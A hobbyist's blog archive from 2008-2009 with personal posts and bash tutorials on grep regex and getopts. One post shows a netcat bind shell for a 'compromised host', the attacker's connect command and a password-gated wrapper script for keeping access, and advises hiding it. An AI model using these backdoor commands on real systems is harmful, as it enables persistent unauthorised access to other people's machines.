Wednesday, January 21, 2009

Quick tutorial on regex with grep..

As of recently I have fallen in love with a certain someone. I don't know about you fellow readers (if there are any), but not keeping myself occupied tends to make me think about her quite a bit. This also leads to anxiety, and then my depression flares up. So I'm trying to keep myself busy, which I have been. I'm also doing my best to control my emotions, but it's like I'm on top of the world when I'm with her. :-)

I'm currently studying for my CompTIA Security+ certification, and along with that I'm taking a class at the local community college.

Now down to the regular expression tutorial...

First of all, what is a regular expression? Well, if you ask me, regular expressions are a handy feature of grep. When you use the global regular expression print tool, you can sift through data with specific precision. Along with that, you can use them to check the "data type" of a variable, something shell programming doesn't technically support the way C++ does (i.e. declaring variable types with char, float, double, etc.). I will show you what I mean in a bit.

First let's do a simple regex example:

root@MonkeysInABarrel:~$echo Joe | grep -E '[[:alpha:]]{1,3}'

To invoke extended regex, you can either use egrep or use grep with the -E parameter. Next, you need to think about the field that you're going to be sifting for. In this example we're looking for 'Joe'.

The pattern is wrapped in single quotes: the opening ' tells the shell where the pattern starts and the closing ' tells it where the pattern ends, so grep receives the pattern exactly as written.

[[:alpha:]] dictates that we're looking for a letter (a-z or A-Z). Finally, {1,3} specifies the length of the alpha string: between one and three letters in a row. For our instance, 'Joe' works just fine, because its three letters fall in the 1-3 range that {1,3} specifies.

The output of the echo Joe | grep command would simply be 'Joe'.

Now for my example of specifying data types for variables in bash shell programming.

#!/bin/bash

# Stops the script when the input fails the check (the original left this function undefined).
killfunction() { exit 1; }

echo "Enter a name:";
read -r answer;

# Keep the input only if it contains 1-3 letters in a row; anything else yields an empty string.
answertest="$(echo "${answer}" | grep -E '[[:alpha:]]{1,3}')";

if [[ "$answertest" ]]
then true;
else echo "You've entered something else...time to die!"; killfunction;
fi

Now here, firstly I'm echoing a prompt and then reading in the answer by using 'read'. (Here's the cool part.) I then set up a new variable called 'answertest' which stores the output of echoing the value of the answer and then filtering it with regex. If the user were to enter a 2, or any number for that matter, the value of 'answertest' would be empty (NULL). If the user were to enter a value of "Joe", 'answertest' would contain Joe. I then use an if statement to test the value of 'answertest'. If the value of the variable is empty, you will get the echo prompt and then the program dies. If the variable contains data, the statement is true (which does nothing, and the program continues executing).
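The post's pattern is not anchored, so grep also reports a match for input that merely contains letters, such as 'Joe2'. This added example (not code from the original post) shows the difference between the post's loose check and an anchored one, and generalises the "data type" idea to alpha, int and float; the function names are my own.

```bash
#!/bin/bash
# Added example, not code from the original post: "type checking" shell input
# with anchored regular expressions.  The post's '[[:alpha:]]{1,3}' is not
# anchored, so grep matches any line that merely *contains* 1-3 letters
# ("Joe2", "x9") and the captured variable is non-empty for bad input too.

# The post's approach: unanchored pattern, judged by whether grep printed anything.
loose_alpha() {
    [ -n "$(printf '%s\n' "$1" | grep -E '[[:alpha:]]{1,3}')" ]
}

# Anchored: -x requires the whole line to match, -q gives only an exit status.
# Exactly 1-3 letters pass; "Joe2", "Joel" and "" do not.
strict_alpha() {
    printf '%s\n' "$1" | grep -Exq '[[:alpha:]]{1,3}'
}

# Generalising the idea to the C-like "types" the post alludes to.  Every
# pattern is whole-line (-x), so "3.14.1" is not a float and "12abc" is not an int.
# (-e is needed where the pattern itself begins with '-'.)
shell_typeof() {
    value="$1"
    if   printf '%s\n' "$value" | grep -Exq '[[:alpha:]]+';                    then echo alpha
    elif printf '%s\n' "$value" | grep -Exq -e '-?[[:digit:]]+';               then echo int
    elif printf '%s\n' "$value" | grep -Exq -e '-?[[:digit:]]+\.[[:digit:]]+'; then echo float
    else echo other
    fi
}

# The post's prompt, with read -r (backslashes kept) and the strict check
# applied before the value is used anywhere else.
prompt_for_name() {
    printf 'Enter a name: '
    read -r answer
    if strict_alpha "$answer"; then
        echo "ok: $answer"
    else
        echo "You've entered something else..." >&2
        return 1
    fi
}
```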


Sunday, December 21, 2008

A quick update..

Well I hope your holidays have been going well and that you're currently employed. I just thought I would let you (you as in the very small amount of people who look at my website) know that I have updated my unix scripts section with another useful script.

Take a look if you get a chance and happy holidays to you all.


Friday, December 19, 2008

Old man snow.. he has shuffled his dandruff over us!

Waking up around 1:00 p.m. to the sound of a snow blower and thinking that it was early in the morning, I peeked outside and, unsurprisingly, there was a new layer of snow. Come on, it's December in Michigan, what are you expecting? People overreact to the fact that we get dumped on with snow every winter.

I honestly think people overreact due to the news. They turn on the news and the news is using fear as a tool for control / entertainment. Bam! Right in your face it reads, "WINTER SNOW STORM WARNING IN EFFECT!". This is part of what grabs your attention, including the crazy music they have in the background that builds up intensity. It will make some people go to the store to get ready for the next winter apocalypse.

Granted, I watch the news, don't get me wrong, but seriously people, we all must realize that the media is always going to overdramatize whatever it can to get the ratings. The news is mostly 'factual' but is also entertainment; if it were up to me I would cut the crap and make the news pretty boring. Alongside that I would try to report more positive news, but I guess that's not normal. They think people only want to hear about the guy on the south side of town slinging crack and stabbing his neighbor over a game of poker. Hence, this is where the control from the media comes in. Keep the masses in fear and this will keep them within control and make them buy your crap.

Maybe I'm not the only one who thinks this.

Sunday, December 25, 2008

Happy holidays!! (To be politically correct)

Is it just me or does every Christmas seem to get more and more commercialized? What does Christmas, or the Holidays generally, mean to most businesses? Well, I sure hope it would mean more business, unless you're in the lawn care business in Alaska. Businesses aside, if you ask me, the true definition of what the Holidays mean to me would be the time spent with family and friends. Gifts and that shit aside, I would rather spend time with the individuals that I care about and who care about me. So when you open up a package of socks that were given to you as a gift and you've watched "A Christmas Story" for the billionth time, just be with the ones you love. Don't worry if you have to return whatever gift because it wasn't quite right; just remember that someone took the time to think about you. Also, to semi-quote Andy Rooney, "if I had really wanted something, I would have bought it by now." Happy holidays to you all! Including the computers that are infected with malicious worms that connect to my web server from China.


Sunday, December 28, 2008

Ubuntu 8.04 > OpenSuse 11.1

Don't get me wrong, I'm not biased toward any operating system, but when it comes to Linux distros, I like distros that recognize 'ifconfig', 'iwlist', 'iwconfig' etc. without any modification.

As I rebuilt a rig that had a bad motherboard (an A8V Deluxe that I adored), I decided to install OpenSuse 11.1 on one of the hard drives. Now, hear me on this: I started out in the Linux world with OpenSuse. I grew to love OpenSuse and depend upon it. Soon I found myself very curious about the oh-so-popular 'Ubuntu'. I gave it a try and it grew on me like a fast growing wart. I adored it and became a big *deb* based user. At the time that I was used to it, iwlist, ifconfig and iwconfig worked just fine with it. (Implying older versions, but even now Ubuntu 8.10 still supports these commands.)

Now within my home network, I just don't want to have a bunch of Ubuntu and Windows rigs running. That doesn't seem very diverse. So I decided to install OpenSuse 11.1 on my rig that needed a new motherboard. Once I got the OS up and running, I discovered that familiar and seemingly universal *nix commands would not function!! I thought to myself, "Wtf?!! These should work on most Linux OSes". But sadly no; even running as the root user, which a Google search implied I should do, did not work for me. I will find myself adjusting to this..

It will be a bit of an annoyance at first, but I will adapt to this. In my humble opinion, right now I still prefer Ubuntu over OpenSuse. I need to keep myself open and adjust to diversity as needed. (So this is a big hint at the bots and individuals who feel the need to crack my webserver.. which may have already been cracked without me knowing.) EDIT: Alrighty, I made a boo-boo. I assumed that if you ran 'sudo' and then whatever command needed admin rights, it would work. This is false under OpenSuse; you need to run 'su' and type your password. You will then get root@whatever and be able to run the typical *nix commands.


Monday, January 05, 2009

NameThatApple update!

For the few of those who might have used my shell script "NameThatApple" or "nta" for short, I have updated the code so that it performs tests more effectively with different *nix variants.

I will illustrate the potential problem (which I mended):

1.) Typical 'which' command outputs look like this:

root@somebox:~$which xhydra

/usr/bin/xhydra

2.) You can then test this output (which I use for testing if programs are installed on a system) by:

# Stops the script when a required program is missing (defined here; the original left it implicit).
killfunction() { exit 1; }

# Capture whatever 'which' prints; on systems where a miss prints nothing, this is empty.
testforprog="$(which prog)"

if [[ "$testforprog" ]]
then true;
else echo "Prog doesn't seem to be installed.."; killfunction;
fi

What this if statement and variable declaration are doing is first loading the output of the 'which' command into a variable, which is then tested by the if statement. If the 'testforprog' variable contains any data, the test passes as true and the program continues executing. If no output was loaded into 'testforprog' (like when the program isn't installed), the program calls the kill function to kill the program.

This is fine and dandy for systems that show no output when the 'which' command is used with a program that doesn't exist (i.e. which programthatdoesntexist, versus which ls), but on OpenSuse the 'which' command has different output, as do *BSD based systems. The output looks more like this:

root@someOpenSusebox:~$which stuff

which: no stuff in (/home/usr/bin/ ...etc.)

or..

root@someBSDbox:~$which stuff

stuff: Command not found.

NTA now tests for these conditions by using a couple of calls to test functions. If you're curious as to how it looks.. download the script yourself! :-)
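Any 'which' variant whose miss message lands on stdout makes the "is the variable non-empty?" test above pass for a program that is not there. This added example (not the NTA script) reproduces the three output styles quoted in the post as constructed samples, shows the text-based test being fooled, and contrasts it with a check that relies on the exit status of the shell builtin 'command -v'; the function names are my own.

```bash
#!/bin/bash
# Added example, not the NTA script: why judging "is X installed?" by the text
# that `which` prints is fragile, and a portable check that is not.
# The three miss messages below are constructed from the post's examples.

# Mimics what a lookup for a program that does NOT exist leaves on stdout
# when the miss message is printed there, in each style the post quotes.
fake_which_output() {
    case "$1" in
        gnu)      printf '' ;;                                      # prints nothing
        opensuse) printf 'which: no stuff in (/home/usr/bin/ ...)\n' ;;
        bsd)      printf 'stuff: Command not found.\n' ;;
    esac
}

# The post's original test: any output at all means "installed".
# Feed it each style of miss message and report what it concludes.
text_test_says_installed() {
    testforprog="$(fake_which_output "$1")"
    if [ -n "$testforprog" ]; then echo yes; else echo no; fi
}

# Robust test: ignore what is printed and use the exit status instead.
# command -v is a shell builtin, so it works even where `which` itself is
# missing (the "which module test" the post plans) or phrases its output differently.
is_installed() {
    command -v "$1" >/dev/null 2>&1
}

# Wrapper in the spirit of NTA's killfunction: stop with a clear message
# when a required tool is absent.
require_prog() {
    is_installed "$1" || { echo "$1 doesn't seem to be installed.." >&2; exit 1; }
}
```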


Monday, March 02, 2009

A quick lesson on getopts and an NTA update!

Those of you who, like me, seek to learn shell scripting for the mere fun of it will sometimes need shell scripts that let users pass arguments on the command line. Granted, one could make a simple shell script that echoes, "What would you like to do?... Alright, now that we have this option, what would you like to do next?.. etc. etc.". This is time-consuming, and using 'read' over and over is not very efficient. So what would you use to make a program that the user runs by simply entering something like someprogram.sh -p 127.0.0.1? Well, you'll want to 'man getopts'. We will also be using a built-in shell construct called 'case'. Have a look here if you want an explanation of 'case'.

#!/bin/bash

function helplist() {
    echo "GetoptsExample.sh usage...";
    echo "-h.............Will list help";
    echo "-p.............Will ping an ip address passed to OPTARG";
}

# "hp:" declares -h (takes no argument) and -p (takes an argument, hence the colon).
while getopts "hp:" options; do
    case $options in
        [h]) helplist;;
        [p]) # Keep the argument only if it looks like a dotted-quad IP address.
             iptest="$(echo "${OPTARG}" | grep -E '[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}')";
             if [[ "$iptest" ]];
             then ping "${iptest}";
             else echo "You need to enter a numeric ip address!";
             fi
             ;;
        [?]) helplist;;   # getopts sets '?' when the user passes an unknown flag
    esac
done

Firstly we are defining a function called 'helplist'. The 'helplist' function contains echo statements which print out the usage for this simple shell script. Without this, our user would be quite confused about how to use the script. This is another aspect of getopts: it makes your shell script much easier for your users to use.

Next comes the while loop. To my best understanding (and just trying to break this down into the English language), what the 'while' loop is doing is having getopts read the flags 'h' and 'p' off the command line, one at a time, and store each one in the variable 'options'. Next, we begin our 'case' statement on the value of 'options' (basically assigning what the flags mean / do). Then we have 'h', which requires no argument. So for the user to use the 'h' option, all they have to enter is: ./GetoptsExample.sh -h. The reason 'h' does not need any argument is that there is no colon directly after it in the string we pass to getopts.

When the user enters ./GetoptsExample.sh -h, the shell script will simply make a call to the predefined function 'helplist'. Also take note that the call to the helplist function is double terminated (;;). This marks the end of that branch of the 'case' statement. Without the double termination, your script will not function.

Now for the 'p' assignment. 'p' requires an argument because it has a colon directly after it. That argument is delivered in 'OPTARG' (a built-in variable that getopts sets). For example, if we weren't testing the input from the user (which I'm about to explain next) and just echoing the value of 'OPTARG', the output of './GetoptsExample.sh -p foobar' would simply be 'foobar'. 'OPTARG' was just assigned the value 'foobar'.

Instead, I have set up this example to test the user input for a numeric IP address. 'iptest' is assigned the output of echoing the value of 'OPTARG' and piping it into a regular expression match using 'grep'. Next, I test the value of 'iptest' to see if it's storing a value. If it isn't (say the input is not something like 127.0.0.1), the value of 'iptest' is empty and the script echoes "You need to enter a numeric ip address!".

On the other hand, if 'iptest' is storing a value, 'ping' will ping the value of iptest.

Next in our 'options' case statement is the flag '?'. This is pretty nifty; it handles error checking for us. If the user were to enter ./GetoptsExample.sh -k (the 'k' flag doesn't exist), the program will make a call to the 'helplist' function. Lastly we end our 'case' statement with 'esac' and end our 'while' with 'done'.
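The pattern in the post is not anchored and does not check octet ranges, so '-p 999.999.999.999' is accepted and handed to ping. This added example (not the post's script) implements the same -h/-p interface with a whole-line match, a per-octet check, and getopts' silent mode so a missing argument (-p with nothing after it) is reported separately from an unknown flag; the function names are my own.

```bash
#!/bin/bash
# Added example, not the post's script: the same -h/-p interface with the
# checks a stricter option parser needs.  Uses only getopts, grep, tr and ping.

usage() {
    echo "Usage: $0 [-h] [-p ipv4-address]"
    echo "  -h   show this help"
    echo "  -p   ping the given dotted-quad IPv4 address (4 packets)"
}

# Whole-line match (-x) plus a per-octet range check.  The post's unanchored
# pattern accepts "999.999.999.999", and for "1.2.3.4 extra" grep prints the
# whole line, so the untouched argument would be handed to ping as-is.
is_ipv4() {
    printf '%s\n' "$1" | grep -Exq '([0-9]{1,3}\.){3}[0-9]{1,3}' || return 1
    for octet in $(printf '%s' "$1" | tr '.' ' '); do
        [ "$octet" -le 255 ] || return 1
    done
}

# Parses the options and returns the action they select, so it can be tested
# without pinging anything: "help", "ping <ip>" or "error <reason>".
parse_args() {
    OPTIND=1          # reset so the function can be called more than once
    action=""
    # A leading ':' silences getopts' own messages and reports a missing
    # argument as ':' (with the flag in OPTARG) instead of lumping it under '?'.
    while getopts ":hp:" opt; do
        case "$opt" in
            h)  action="help" ;;
            p)  if is_ipv4 "$OPTARG"; then action="ping $OPTARG"
                else action="error not an IPv4 address: $OPTARG"; fi ;;
            :)  action="error option -$OPTARG needs an argument" ;;
            \?) action="error unknown option -$OPTARG" ;;
        esac
    done
    [ -n "$action" ] || action="help"   # no options given at all
    echo "$action"
}

main() {
    result="$(parse_args "$@")"
    case "$result" in
        help)     usage ;;
        ping\ *)  ping -c 4 "${result#ping }" ;;
        error\ *) echo "${result#error }" >&2; usage >&2; return 2 ;;
    esac
}

main "$@"
```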

Monday, March 02, 2009

NameThatApple update!

As promised earlier, I have updated NTA. This update includes a few new functions and tests. There is now a test to see if any hosts on the local subnet have the AFP port 548 in the open state. The reason I added this update is that in a public location I had noticed an individual who had an Apple computer whose MAC address showed up as 'UNKNOWN' under nmap. His computer name was not showing up in my results. My program originally just tested whether there are Apple computers on the local area network by checking whether any computer has an Apple MAC address.

The owner may have spoofed his MAC address. After further investigation, I did discover that tcp port 548 was open on his computer (which is the Apple file sharing port). So this is why I decided to add a few new modules that test for this condition.

Basically, if there are any Apple MAC addresses on the LAN, it will try connecting to those, and it will do a port scan for any hosts that have tcp port 548 open. (It will also try to connect to these hosts as well. Bear in mind there may be duplicate hosts that appear in the results.)
Check the revised nta program!

Thursday, February 12, 2009

Authenticating yourself on a compromised host using netcat...

Good day fellow readers, hopefully you're doing well and haven't gone through any emotional roller coaster rides in the past month as I have. (Yeah... the special someone mentioned in the last post whom I was seeing... it came to an abrupt end.. not that you care, and I'm disclosing more information than you need to know). Now enough of that.. it's time for the main course.

If you haven't checked out a nifty program called netcat then please do so. For you Linux users please go here, and you Window$ users please go here. I put a link to securityfocus.com due to the fact that I haven't had any luck accessing vulnwatch.org.

Now if you need any tutorials on netcat, please have a look here.

One problem when you use netcat on a host that you have gained access to, and use it as your way back in, is that netcat requires no authentication. This means that anyone else using netcat can connect to the port that you have netcat listening on.

For example:

This is the server side (the compromised host):

user@compromised-box:~$nc -vv -l -s CompromisedIPaddress -p 1234 -e /bin/bash

This is the client side (the attacker side):

user@evil-client:~$nc -vv CompromisedIPaddress 1234

This method requires no authentication, so it is very insecure. Along with that, netcat transmits everything in clear text, so a good alternative to netcat would be cryptcat. For an attacker who just needs access and has fooled the victim into running a netcat script (or whatever method gets netcat running on the victim box) this is great. But what if we want to keep accessing this rig using netcat? I pondered this situation and decided to put my weak programming skills to use.

I've written a bash shell script that requires authentication from netcat users (if they set it up correctly). Let me show you the code.

#!/bin/bash

###A shell script that authenticates netcat users, who may have already had access to a compromised host####

# MD5 of a file holding the username on one line and the password on the next (see below).
PassSum="9f8e6dc67740727a61037f3a68266259"

echo "Enter your user name:";
read -r username;
echo "Enter your password:";
stty -echo 2>/dev/null   # there is no terminal on a raw netcat connection, so ignore the error
read -r password;
stty echo 2>/dev/null

# Note: the typed credentials sit in clear text in ./passfile until it is removed below.
echo "${username}" > passfile;
echo "${password}" >> passfile;

CheckSum="$(md5sum passfile | awk '{print $1}')";

if [[ "${PassSum}" = "${CheckSum}" ]]
then echo "Welcome to the system.."; rm passfile; /bin/bash;
else echo "Failure!!"; rm passfile; exit 0
fi

Now this script has a predetermined MD5 hash sum. You must make your own hash sum to use this file. For this hash sum I simply made a file that looked like this:

abdi

thisisareallybadpassword

Where 'abdi' is the username and 'thisisareallybadpassword' is self explanatory. This file contained no spaces and only one carriage return to separate the username and password. I then ran md5sum on the file, and the hash it produced is the one used in the shell script. If the user enters a username and password that don't match what is in the password file, the session will not be made. To set this shell script up on the victim host you would do:

user@compromised-box:~$nc -vv -L -s CompromisedIPaddress -p 1234 -e locationToShellScript.sh

An attacker might want to have this script hidden and in a location that isn't too obvious.

For those of you who want a better method of connecting to a compromised host (well, vice versa for this instance) you may want to read this.

Thursday, February 12, 2009

NTA update!

Once I get the motivation and overcome this little period of depression, I will be updating 'NameThatApple'. The updates will include:

A 'which' module test. This module will test whether or not the user has the 'which' program installed.

An additional test to see if any hosts have port 548 (the Apple file sharing port) open. I've noticed that under nmap, some Apple computers' MAC addresses sometimes show up as 'unknown'. So along with enumerating the MAC addresses in a local subnet, I will also set up 'NameThatApple' to look for hosts that have port 548 open and add them to a 'for' loop for host name enumeration.


Thursday, February 12, 2009

Cartoons note..

Within the next week I will be posting some hand drawn cartoons for any of my viewers. I just need that magical emotion 'motivation'. Just be patient! :-)


Thursday, December 18, 2008

A Steal!

While being unemployed, I have found myself with quite a bit of free time. So I try to generally keep myself busy and work on productive things. Without keeping myself occupied, I usually get depressed. (I think most people would.) Oh yeah.. this is entitled 'A Steal!'. Let me explain. The other night I had a dream (a premonition if you will) that I went to some video game store and decided to get a cheap used console and some games.

Waking up and pondering that dream.. (I also pondered a Futurama episode where Fry wakes up from a dream that was a commercial), I thought to myself "Eh, what the hell? Why not?" Don't get me wrong, video games in general are a waste of time. There are so many more productive things that one could do with their time, but if you're a bit of a nerd and have a soft spot for video games, you'll find yourself wasting hours playing pointless video games.

If you think about it, be it Pong, Half-Life 2, World of Warcraft, or whatever game you can think of, the time spent on these games is generally of the same value. The value of the time spent on video games is null. (Unless you're making cash.. that's a whole new story.) So going out and buying the newest, greatest console / computer system for gaming is out of the question and not within a reasonable budget for myself.

Being unemployed, I thought to myself, "Best to be frugal and not spend too much". I gave 'Play-n-Trade' a call to get some price quotes on an Xbox and inquired about whether or not they had 'Oddworld: Munch's Odyssey' in stock. And whaddya know? They had an original Xbox for 40 bucks and they had the Oddworld game in stock! (Which cost 5 bucks.) So I ran out to my local 'Play-n-Trade' and blew a wad o' cash on some new toys. Not the most productive of items to get, but money better spent on that versus something more wasteful or what have you.
